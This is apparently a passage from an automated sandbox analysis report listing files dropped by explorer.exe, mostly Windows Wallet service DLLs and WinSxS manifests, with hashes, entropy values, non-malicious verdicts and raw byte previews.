                                                                                                                                    SHA-256:23CC82878957683184FBD0E3098E9E6858978BF78D7812C6D7470EBDC79D1C5C
                                                                                                                                    SHA-512:CC8DB1B0C4BBD94DFC8A669CD6ACCF6FA29DC1034CE03D9DAE53D6CE117BB86B432BF040FB53230B612C6E9A325E58ACC8EBB600F760A8D9D6A383CE751FD6ED
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K......K..H...K..O...K...J..K..J...K..K...K..C...K.....K..I...K.Rich..K.........PE..L..................!.....t...........x...............................................*....@A........................P...n...8........................................s..T............................%..................4............................text....s.......t.................. ..`.data...\............x..............@....idata...............z..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\System32\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):412160
                                                                                                                                    Entropy (8bit):6.440111636589855
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:Zb4spB+uPpnV5dH+V15pyYy8W/czcJauE:Zb4sB+uPpnVHH+hpyYydczcJY
                                                                                                                                    MD5:02557C141C9E153C2B7987B79A3A2DD7
                                                                                                                                    SHA1:A054761382EE68608B6A3B62B68138DC205F576B
                                                                                                                                    SHA-256:207C587E769E2655669BD3CE1D28A00BCAC08F023013735F026F65C0E3BAA6F4
                                                                                                                                    SHA-512:A37E29C115BCB9956B1F8FD2022F2E3966C1FA2A0EFA5C2EE2D14BC5C41BFDDAE0DEEA4D481A681D13EC58E9DEC41E7565F8B4EB1C10F2C44C03E58BDD2792B3
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A4u..U...U...U...-..OU...>...U...>...U...U...T...>...U...>...U...>...U...>..<U...>...U...>...U..Rich.U..........................PE..L....Q.=...........!................pJ....................................................@A................................T....................................l...%..T...............................................P............................text............................... ..`.data...............................@....idata..Z...........................@..@.didat..............................@....rsrc...............................@..@.reloc...l.......n..................@..B................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\Manifests\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332.manifest

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1925
                                                                                                                                    Entropy (8bit):7.880531057305082
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:YzTeLX6lkwa15AhlgBAK5SKQP8stOiouDXr1ee2L5qWQvblR/NrXhknF/64lfsK/:eGXAxn4iRXr+qXdex6YfrJXq9G
                                                                                                                                    MD5:D69A1676090849FAA06B2BF4CBE631DF
                                                                                                                                    SHA1:5206FB038C2F8D69EA8F6C09AE64DE3413D3CC33
                                                                                                                                    SHA-256:27584AC3596B10D23744C95EADA3002419CB1551C7F959A24143B71FD11D285B
                                                                                                                                    SHA-512:9EEE0ECCAAF3203B8F106D4EAF3BF0914BBEC7D6CB76442FC1BD59F1B3552EA2A104BC0BC8280C2DE4C81472F5806AE5C1F1158FD093C61179E103170D6EEBFB
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:DCM.PA30........#.R..d;c................B...Yb...g..%(H.1.%.R..]&.M.N'k.L.....]...wsK3.B&@#...L....$&.Xp.IL..\H....LL...gnz...:.t.s2.R>.K..=..wNOsz..'..3>?'..=.s..;...Q..Pzd-N./.X...Z,....o.X.Z.+.:y...dy.Xp..)>..G....C.H..!@..."..@.....QP.Q.A.g.....J6...a+.......j.v..Zd...:d../.s-.:E-.@*P.G.......$.Ts.Yk.Y......0.@.8.....P.).....4-..i........*...5...4U.3....:H..(P........o[..~./..k./.`.....U..M%.....$..(....V.....W5.K...........N.....>0. ..P$...Apa...P....0../................c.....mo...2...q.9...........+C..oO.....J7....E.=Xi.2..pd....pn...=....}.z.....aTq.....E..<....U..x...BS.@.....~.K.|.9u.p...Y.;#....n-.....-.M....3...\d...F..@..c.. ..qo3...i...,.....".".F.BZv*.C.vm.S.shm..tZoM.....s.....|l.....H<.r.R....x.ed).=...r..X[$=.N.RJ/..<dK>O....M.t-W..Mb..xA).WA.K./...Q...J.....+.9...8..yB8..~aXCC..O...!.?3I.[.v|.SL..YE.0|....m..2R..CIP../.R6[?+g5+.3+m.EfU`....R...+....@..g[....p.P....#B0...B.\..wJ.q.}bZ..u....7__..!f.}/H.qS..4J#.....>b{..c.L.}

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\Manifests\amd64_microsoft-windows-wallet-service_31bf3856ad364e35_10.0.19041.985_none_61f85cc11deb0ddb.manifest

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):129
                                                                                                                                    Entropy (8bit):6.225304170266239
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:m1kSpj68sxItUV/LWGE8nsvZhg1jF12+/dIaV:0j68mItUtL1E8sBG150udz
                                                                                                                                    MD5:D0145A9E87B8696BD48F16C377FC213E
                                                                                                                                    SHA1:5CA91E81C562EB5854F8DF196B023DFB4E26180A
                                                                                                                                    SHA-256:ABBCDCB9498A061C67E5D20C91F5A2D19F5E58B0A06FB0419C1FB95DC78BBF3F
                                                                                                                                    SHA-512:6D18B32304AE40D1CDCFAE49145EEFB733CB5B749D12B7C8A78EB4D10AA1CFB67598E7FCB88DC291B3D33BFE5AD0F41B613F6197BF5792A06B3CA3AF76BF95DF
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:DCM.PA30........#p.B.......Y3.:hb0.6.!..{r...p..a.DJ.!..Z........5Rt/ .0.1X....@..`p.$ tQ0H."d2...@.raPF ....`iQ..%` 8.D.`/.C.0

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\Manifests\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed.manifest

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2651
                                                                                                                                    Entropy (8bit):7.923167651125927
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:aDDIrWWtGhE0tfzWAtBFX4RYy5+hvFKYTGzhU8IAr+jDkTe/RXtXDeoS:aDDqW+GFzDTFX4RG5UWudJ+ECbSoS
                                                                                                                                    MD5:64822B32C2B3B02FF3B50FDC5C8CF03A
                                                                                                                                    SHA1:05D4C2FA8AEF378580DCDEA50F9F3810F111607B
                                                                                                                                    SHA-256:E04C4314E857CF1D0569775F3C6D70F8C93BD4CC5615D9658F37A63166D5BF2B
                                                                                                                                    SHA-512:CEB2C237E8FBD572E3B05FE7D2F954276B9DAEB5FA9D89B31280F7CD76B2BEA857B173B79FD71F0F7EC22B646B2E0752710EC6D397411F10B1982EBB261B0063
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:DCM.PA30........#`.d...Rf................B....\.._@.I...&.......L.cx,........b.\.....`e..6......}..n.[...JX.bE.2:t......xK=.d"....y8........y.....T.<...-'..}:.?<....b.F..P(H.H......bi_.uZ..~..[...^........Jy_...o...{.>.k..o.Z. ...1.....a....F..9.z..q!..B...!`t......,*j.Z.+.5 ...T....\..P.......T;......@..@5.Z.Ck=B..@.6$<..i7......H.......o..l.M@6t..(.PA..F.p....D...R@.....P..*.7!I."A.O..*.Z.Kk.$.1l.XF7.4v.v.W3.j..K.5..X..h.H.M2!Gd"..A....<l.)..s.....QH!...>Zt..J\u...>..T5Z.....4..52.t..4....=.:..qzD..b.u....!.m....Koqb..I`a.@...8......"p.#.G.>.. 8<.B.....h.*..>o.O4...iqg.....ED[s.m.?.....*.~.W".M...9..]..^.^..,....d.`..q..?K...L...j..l.....-...a..$@b...........V..[n.\..{.iq....dr.......O:.9..)...r.}.X....KQ.m....\."|.y.a...U1.9.{\9...J-.Wv...9....r.A0.q.......j.k.<.;..<..m`.'.@....?......e..=.%.#}t..%.6....0\.....^.~..v.|h.......w.e.i.e..7^..~u$.Z...:..`..z9.......[3...3.V..;...C...b..w...3.j................B[L..e.q.`....z3.E#h..{.im..]`.Mw.9

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\Manifests\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d.manifest

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1453
                                                                                                                                    Entropy (8bit):7.857353187163721
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:+Kl82gzljX0rrwhdsYEgpg3yS3o7UmBmecFiYp7MxFSkYjLpoBzvLvE:+Klk1ErrwhdsYEQHSeU3lkFSkeLczvjE
                                                                                                                                    MD5:538657D60B01761CBE1816FC19A02162
                                                                                                                                    SHA1:544E630EA3C609C01EC34EFEFDE464A2515F35DE
                                                                                                                                    SHA-256:1908669EB15334E414077C524C939FEDE44EAE44E131392D12E13FAA7E7C856A
                                                                                                                                    SHA-512:EBA0E354F807A52C6966FBB0EA9DD5262AE2FA2DB6CDD680E75678946147C5B2C384515671A27403A74BE7D80B8CD8DC0D3664CE8D2A9DB7AF74FC83FD19D06F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:DCM.PA30........#`.M...,`................ .....B.|.;w.f"&B.......f..8.U..]..&]....C......~....._.5~.P1...[.o,.,..#.R/.....9...S.....R..\.........y...1'....F.....{d..K..X\~.....!..P.<....`..2.}0.a$0..DHh.L0a*..).7.*..AD..Y.FgB.z..p..!..a.......|....B.;".DMdg.4...CuH..p..h..|8.$...D@p+..W'.#X.L...v.]>.&.#.......30@. ...t#...`.Q.X\......G.j.DC....<.....]O../~%....V1....._.Q..x%..$).X.D...~... .Y.ivS..'..kc.-}.2cM.$2.a..UN....1N.^`...S...6..K'.0.T..%..z...)W...r...).5P...^.!{.,>...o..uZX.I.@..\....W....3f...g......`..}...F.,.s....zV...E6p.....nxOTm.......s...9?.........q,..W_V8f.x.M.~.E.0..~N)8..?'....F4...~.......F...U.u5.......,..)6.9.y...1.F..vd...P<..%.z......jC...Y.Y....N.b..nCq....h...........6.*...f.~.h..0Lv.....1.3..y..^;...\*d.f..W.mqcq}....o.z.......u..0.um.THSct.............."0.@.1.yK...5.L.25p.}.8..]........`...V....`&....N.]..g.......Y.!].........k..8......J.)...0.aac8..`..$.-.1.......v71.;....O0.....w..w..WF...\.j...b

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\Manifests\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8.manifest

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2656
                                                                                                                                    Entropy (8bit):7.917767709211648
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:48:A2H+ymK+ZHuWIYv3Do6YzWKG8d8MaGcNwxP8RJeSWWg4hCXRcpByt:5hK0WPv+HgGc2EWihRpw
                                                                                                                                    MD5:115F96A41622825493AB3D5C62DB6395
                                                                                                                                    SHA1:99C0C022BADAB0B0268874951FEE801F52856A34
                                                                                                                                    SHA-256:314CD9C49E9D160A31C5B8D6788BB3B539A760D08877D8D183118769FFD106CE
                                                                                                                                    SHA-512:967BAA20D3411792438B3EB17F0268F21727F6F6D50306B69478D37F7DA9A6A0B465BED06A3E9DD26002E6A030742692BFF4D4018C1AE3917EAA5745E9355A4D
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:DCM.PA30........#`.d..<Rf.....................\.._@"9&L.0...a......<.....02.y....".3.....+....:;3.....oA...*a........r7..-......s...Tlp.o....g.SA..O......l..P>.m5...a.B. .VK..._....^..+.&.....Na...........X..}...'..VP......_..C.!..B.B .!B..2.v.....B...!`pT.....,*j..F..R`.pm..........<.P..-..98.v$\.?m..e.b..&..z.Z.jmHx...n..8D.!.(2....D..%....l..&..8)..c..l.......H@.......p...1.d.!.Q.ri..."........j.S-4`i...........IB....@JP.."*..@B....;J.......X.1$.QC..B...D].....F..f5...kd~...h.j..{.u...`.H....k.e.C.Y.4R.;.....C......f.. ..."...xD......G_. j0. ...J...[....nZ...G.}...n[.O%..c}.y?.+..cX...p...._.jJ/.e.?e.E.$0.....%..c..`w5vvF6.Z.h...X..p../(...$....K..yww....-.s.c......{r2.....e.'...o...Tb9.....z.%/.6..?t.....y.a...U1.9.{\9...J-.Wv...9#..Tr.~0.qI@.....j.k.<.;..<..m..'SC....?......e..=.%.#}t..%.6....0\.......~..&.|h!T.....w..i.e..7...xu$.Z...:.4`..z9.......[3Q..3.V.).v.....i..,.....g..5.1.{|..gw.vJ..[...m1..).....L..h...?.....-...

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):442368
                                                                                                                                    Entropy (8bit):5.978701024088282
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:XokhsNDMYP8/1bKJNttfgCw+fJ1GM8vFfxrxlejA9xi0mz3pNB3LfYuDSyl5ES:0DMYP85S/gKfJ1GM8vFfnlXYpNhHSUE
                                                                                                                                    MD5:D765B98325D89C076FEEAB1282CD08EA
                                                                                                                                    SHA1:1C0E044DB845F4BF5486CCF23675B5394D568BB3
                                                                                                                                    SHA-256:AC2F0A68A2BCAAF2DECB0AAF1B50D652ED8B631B08D06B910B407FEF9069412E
                                                                                                                                    SHA-512:5C726E7CA5282D1F51178C814C76CA268B604CCB5AAD744AADFDDED4883F9E28AFD0D9F9A30DACA2FED017028C54E54F6E04F3AABB12A2D0B37A44267FADB37D
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z..............0.z...................j...........................S....\...........Rich...........................PE..d..............." ................@....................................................`A.........................................I.......J..L................(......................p....................N..(....L..............0N.......B..`....................text............................... ..`.rdata...E...0...F..................@..@.data................^..............@....pdata...(.......*...t..............@..@.didat..x...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\f\WalletService.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):11320
                                                                                                                                    Entropy (8bit):7.97134111747386
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:KyYdVpzHlCcbq/iilrHfm//Z7q9SZENls7FCp1BUpR3erf8M1RyyQ8Jy0PzGtC:mdVpYBXHUZKaENexq16v00fdGitC
                                                                                                                                    MD5:204C37449F2F435BCD47FC3A33589BA8
                                                                                                                                    SHA1:B8CE4D2B474A44B151F4252F44FC3D6C5D49E8F9
                                                                                                                                    SHA-256:23387B832B727F280FD036581CACABDEBF1CCACC1C9C6782939487F9456627A6
                                                                                                                                    SHA-512:54C3CDCE836703500B02ABA2D715AD0C3E803A79BA49B6B436AECFC580C47081CD9A384E913C50B121C2DD2F1ECE8A62BDEEE6D40C33CC438154966CB075D677
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:...PA30.ofn.<...^.............e..%..o...................P._e]..<................++...-........... ..........@.o....@.......g.....}...T...UU..=..`.V....U.>.?.......}...QQ..........,.a....t..?:..g....r..@B.B.#......b.`.v..Fa:...#.8x..T@..(..B...p.....j.......+.8<8....#...7.L_8M..9.....l6$.....#.........8.s..[..t@..@.....~.....[.!...RdW.....@q$#..G..x.&..8..Q.#...S|+`o.].......8........./......@..@.P....?.$.h.#....9./G."`..$..cO1x.........gPX.W......g..qo.).c....g.....$...`.@=8...`...Q.}....1_...............'1..1....f..G.cN..`.I.."...(......uEPh...8.F...;.0.Q..L.4..3`...g.}...A11..c.....L......Ab.Q...`.M.....}.17.G}..8......W.0<f.c.M....c>.0....$...?...>GP0..cn. ...<...............c..f@.!w....sp`.......S4*.8....p.Q!.I06..-.........~p....QC.|p...?.D.....8D..1 ........!...!..........$\.gQ....%R.~A`....).W.V......4....d(. .O.(@t..L..i..$......`..Db,....,...$....0..$...u.....*/..8.$..F.(..`@.Z..4...!J....!3..*.K..qPjiI.h...X.A.4.&M8..4..$E.4Y.mP+E..6i.

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\r\WalletService.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):10013
                                                                                                                                    Entropy (8bit):7.971223878586799
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:cidfT6qGSxt6xs03vf1ImnbjTLXJEuR7Kx00yel13K26fzooq7:ciJcN3XfbjXXJsOHel1K2x77
                                                                                                                                    MD5:516049B4656F0540B3900A19C43EB0E7
                                                                                                                                    SHA1:6FD0260FE345C763E042842D204C8CDDB4D9E1D9
                                                                                                                                    SHA-256:D53A4AFC80B79999013BFD983BDB0A5DDDED457397DEBF149002335C2FCEADAF
                                                                                                                                    SHA-512:2DCA05B264BFFCC62E3B92B5E61AA037EF858F6F625E5C0E946A82F1EDF7586C17244001093567FF534C4C31E41DC6446FBB23E5F1C6B6A5FE798F2DD6D939EF
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:=.&.PA30Nlr......^............I%....Q..E.Z.2^$............. ..h[..<................++...=.........." .......A..............o...!.....a233TTTTUfVw..##..h.sCCSUw......wgXX.d2C4Eex.....xwv....!....Q$.C...Y..U.ZL..[..=.1.. as...;|Nz.62....f..yV...x.y...8....W+.2..H..%.....`M;..)E;...{A....x........6.............x...\@}a........A][B...!.OPX.WYV#.e9R.fj@..'.A7.).4.!.....]...............@.3....!@`?:.......(....@.....d.......0.N.!.6...&..........B.......W .....*......AB.w...O..{..+.....O!C.+..?...?..'q.7.G.pg.g.A!.........3.p...|....'a...c.(\.../...$...0.../.G....g~..r....q.O...."Qa~.f.Hpp.~.0,4.&0.H..3.....7....I.s#P$.?....P..G`..1?.b^H(..?..@.?..3........q...b.H,..g...PHp....)0.'P.G`~.8.....A....._......~..1....S. ..(....;..:..A....q,.`_Q..&:.5$.b....`...$a ...LL@..B@G..........".._$8....".......g@...7....|.A@.....w...4....4..?.4.`...7..........a@...5 ..;..).+......s`.......}..>..=N9GI....@...sh..%..C?.S1.J!......)..d&.... ......88...S.CZ.!% T..h4..@.`.q.E.wvF3D...

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):12800
                                                                                                                                    Entropy (8bit):4.703646249615889
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:pOMUgMuF9z0lWc37O4R30jKRyR1C/jjjjjas+7atDgx7PuEcWZf2P4WwrW:k7gzF9z0lWcrOjjkyR1CTSDZBWwrW
                                                                                                                                    MD5:B7D6A6BB752E0F3B336FE9F48F2BD17F
                                                                                                                                    SHA1:B2C212468D9E4988A13EBF5B8397FC864E958D4A
                                                                                                                                    SHA-256:6AAFA6D7EE7B50F43A1A74F518132AD1F9E0CA2C7C1C83CB0508E716A7EEF276
                                                                                                                                    SHA-512:0210AF854EA1504D1D15B17979E3FB3140C3DDF037DBB828C42E4B656F93696744AA1F88C2E94E67781EAA16D923B69FB016D30E99879CCA41F69FE9E3B1004D
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Tz....i...i...i..c....i..pj...i..pm...i...h...i..ph...i..pl...i..pi...i..pa...i..p....i..pk...i.Rich..i.........PE..d.....t!.........." ......... ......0................................................9....`A.........................................8.......8.......`..8....P...............p..D....3..T............................0...............1...............................text...0........................... ..`.rdata.......0......................@..@.data...X....@.......&..............@....pdata.......P.......(..............@..@.rsrc...8....`.......*..............@..@.reloc..D....p.......0..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.mui

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):5120
                                                                                                                                    Entropy (8bit):3.6408151632411823
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:UBJvWcl8ClOolTPJlnrO0Q/LnPDQ6g6HQS+EWI4sWwB:kJxaCgohRF94gDzSTWI4sWW
                                                                                                                                    MD5:BC5D54311D229EACEB98977248A3E44C
                                                                                                                                    SHA1:0011AE8085B6409A944A9E431652D9CAFBCFCE48
                                                                                                                                    SHA-256:32737C8E34B90B7F0D57B607B07B641F7B8A80AE4797856C6CB8CCBF8C1414FE
                                                                                                                                    SHA-512:09BFF5F078A0834E8AC11A02FC57763AAC1224E06D0ECF7940AF38D2BC5E41B38FF5D508BD1C8A73B46C68A3C01916D1ED2E18925E0B1D2FE6D10D422AD7B4B8
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L..................!.........................................................0......0J....@.......................................... ..$...............................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....|..{........T...8...8.......|..{........$...................8....rdata..8...x....rdata$zzzdbg.... ..p....rsrc$01....p!.......rsrc$02.... ....K.....o.....#k..w..2....|..{........................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):104960
                                                                                                                                    Entropy (8bit):3.868055965362207
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:1iSLYz5Eotn0mdTnLJgAAn8vmZZrrtHBIE:1iSLYzOg0kTnLinmmZZ9hIE
                                                                                                                                    MD5:0EC2F54AF7A73C0281E0B7BA5A40ABCB
                                                                                                                                    SHA1:6D1B10FA5B1563307278B974DE0A131452DD6641
                                                                                                                                    SHA-256:F80FCC0E391B6A9A881E1D44E7A4B521CB54134E32DDE6E5B57D68DA7C75A1E8
                                                                                                                                    SHA-512:8D43CAA8023D35AAFD87EBD76970FB54411D2E7709D7C89CE0831D6D1931EF22138601AF94DE27DEC53CB326411A47DA588479843CA07CF920D8177B5FA233FD
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....................................R....................(................Rich...........................PE..d...2. b.........." ................................................................a.....`A............................................p...p................... ...............4...0~..T............................!..............."...............................text...p........................... ..`.rdata...^...0...`..................@..@.data...p............z..............@....pdata.. ............|..............@..@.rsrc................~..............@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):577024
                                                                                                                                    Entropy (8bit):5.941146933733838
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:pc2FNfvfmoCR9/TQ462FRdQgLpNhY7pjiUk:ZmZJ62FR2gNNhcq
                                                                                                                                    MD5:CF72D2BB801B140D14B5EF94A7193333
                                                                                                                                    SHA1:A012220FE3A7AA1866EBEE06EEAEFF5488224D21
                                                                                                                                    SHA-256:95A8DC32BCE0D7BF43235D7C6F593CBBCEE2EA79D84B955424BC582968D737E4
                                                                                                                                    SHA-512:F8C5A8C4CFB8CC90710CC88F29885A174161E7123EE16EE4A3165CA0AA3074F3A7C6A93761FDF7A387A187F53FD3FED952F6E285A23485C56BE7EF0631D3180D
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3...]...]...]......]..Y...]..^...]...\...]..\...]..X...]..]...]..U...].....].._...].Rich..].........................PE..d.....%l.........." .....h...j......0G.......................................0............`A........................................p=.......>...................0..............<C.....p...........................................(.......p3.......................text....g.......h.................. ..`.rdata...............l..............@..@.data........`.......F..............@....pdata...0.......2...P..............@..@.didat..............................@....rsrc...............................@..@.reloc..<C.......D..................@..B........................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\f\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):25347
                                                                                                                                    Entropy (8bit):7.9790494358638995
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:ImljMJ48qjDELoE1AOwBpqMcBiyiETh0v+v4:Iml+48qjUuuriqTs
                                                                                                                                    MD5:2ACB0C8EB5B30A91B246530968927EFD
                                                                                                                                    SHA1:F5D0E77682643AF7B28D25862C65DE17943B8865
                                                                                                                                    SHA-256:C33F8B5EF6B87F29FBFDEE4B8C727AC427CA279B83E1A5F6C32B406A3E3BB7D4
                                                                                                                                    SHA-512:228679A1C8E8A515BA4B5DEA893779D4E34105A0BC4DB4F3E88F11253029D4A6E9CA0665AF9C6CAFF831627B9B5AE7C7B91F12B57C79AEF6B561DF8B0B512163
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:.g..PA30.OX'.....^......8#.....r.........33................(a[..,............**..."...=.........."...8....p.?.../......o.....?A.|.....hd.............fJj........................9..P......x..@....,!..g..4!...M..!...M..!...&..........W......(...)...V......&...$$.{....8..?0...).2._....pF...............W..p@....p./`A....b...~....$L.....). .l..d.....VR.............X.P.@..K.f.......`...H....J8 a......N...;.w..t...}.TmXp2..<...+`...p@..;_.z.L..{....`.;H....t`......\b/ ......z...b....- z.>sJ1..s...N"^....O........Mf...}..$........p@.D@..{......C..d98.;.W8.............0o``.A1.....`0..(|..`..K..........!...@LO...? ......|...L8.p.......@.........!.2`...7..........cH ..o.p..k.@..EPA..........1P.C"..1.V..!...., .P$....X...s......1.)p.q.p....!... ~..b5...........I......9...hC.....a.t...8...@.b.sd..O.T...*............\.u.2..#..xxH..PN<]..G#.....J.5\..YW.\..p'...{xd...w...=.=<.....N6..%q.p'.......h..."....p...D...p.w.*<..A.8. ".%.M...$h..%......+..O.XV..U..j...tZ.

                                                                                                                                    C:\Users\user\AppData\Local\Temp\D700\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\r\Windows.ApplicationModel.Wallet.dll

                                                                                                                                    Download File
